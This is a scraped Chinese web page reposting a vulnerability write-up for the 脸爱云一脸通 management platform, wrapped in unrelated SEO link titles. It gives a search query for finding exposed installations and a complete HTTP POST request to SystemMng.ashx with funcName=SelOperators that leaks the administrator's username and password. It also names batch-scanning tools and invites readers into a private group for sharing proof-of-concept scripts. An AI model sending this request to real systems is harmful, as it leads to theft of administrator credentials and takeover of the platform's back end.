当前位置: 首页 > news >正文

企业建设营销网站有哪些步骤变更网站备案信息

企业建设营销网站有哪些步骤,变更网站备案信息,兰州网站seo优化公司,新零售网络推广方案0x01 产品简介 脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。 功能包括:系统管理中心、人员信息管理中心、设备…

0x01 产品简介

脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。
功能包括:系统管理中心、人员信息管理中心、设备管理中心、消费管理子系统、订餐管理子系统、水控管理子系统、电控管理子系统、考勤管理子系统、门禁通道管理子系统、会议签到管理子系统、访客管理子系统。

0x02 漏洞概述

脸爱云一脸通智慧管理平台存在信息泄露漏洞,该漏洞源于SystemMng.ashx接口处存在信息泄露漏洞,攻击者能够利用该漏洞通过SelOperators参数泄露的当前管理员的敏感信息,包括账号密码登录系统后台。

0x03 搜索语法

body="View/UserReserved/UserReservedTest.aspx"

在这里插入图片描述

0x04 漏洞复现

POST /SystemMng.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closeusername=admin&funcName=SelOperators

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

http://www.yayakq.cn/news/651171/

相关文章:

  • 网站挂载wordpress主题放在那个文件夹
  • 网络课程系统网站建设费用做网站费用计入什么
  • 网站制作公司员工网站功能流程图
  • 网站上的图片一般多大wordpress安装无法登录
  • 网站设计二级页面怎么做北京pc28网站
  • 网站建设小程序开发报价网络系统管理学什么
  • 百度登录首页百度首页排名优化平台
  • 天津网站建设设计石家庄人口
  • 网站怎么添加导航栏wordpress可以做网页吗
  • 免费网站模板制作大型网站建设完全教程
  • wordpress 做仿站免费logo设计生成器在线制作
  • 上海高端定制网站公司成都公司展厅设计公司
  • 广州网站建设八爪鱼公装网站怎么做
  • 网站建设的程序网站建设开发方式包括购买
  • 广州网站建设开发网吧网络维护公司
  • 电子政务门户网站建设教训目前最新国际消息
  • 12306网站学生做电商平台开发方案
  • 苏州公司注册代理记账网站优化插件
  • 你的网站尚未进行备案优化网站排名费用
  • 苏州高端网站建设网站开发器
  • 沈阳网站建站阿里云wordpress讲解
  • 网站更改目录做301湖北最专业的公司网站建设平台
  • 传奇手游官方网站中小型企业建设一个网站大概需要多少钱
  • 简单aspx网站开发百度指数是怎么计算的
  • 南京网站设计公司排名电子印章在线制作网站
  • 广东泰通建设有限公司网站最大的高仿手表网站
  • 国外获奖网站做网站需要什么配置的笔记本
  • 全国网站建设哪家好怎样设计个人网站
  • 深圳网站建设领先深圳网络推广公司
  • 湖北省建设银行网站网络优化公司哪家好